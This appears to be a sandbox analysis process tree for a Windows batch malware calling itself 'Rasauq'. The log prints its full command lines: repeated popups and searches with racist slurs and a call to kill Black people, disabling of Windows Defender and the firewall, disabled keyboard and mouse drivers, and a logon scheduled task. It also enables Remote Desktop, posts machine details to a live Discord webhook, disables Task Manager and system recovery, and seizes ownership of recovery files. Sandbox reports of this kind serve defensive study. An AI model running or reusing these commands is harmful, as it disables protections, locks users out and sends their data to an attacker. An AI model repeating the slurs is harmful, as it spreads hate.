C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\openfiles.exeopenfiles4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Invoke-WebRequest -Uri 'https://api64.ipify.org').Content"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
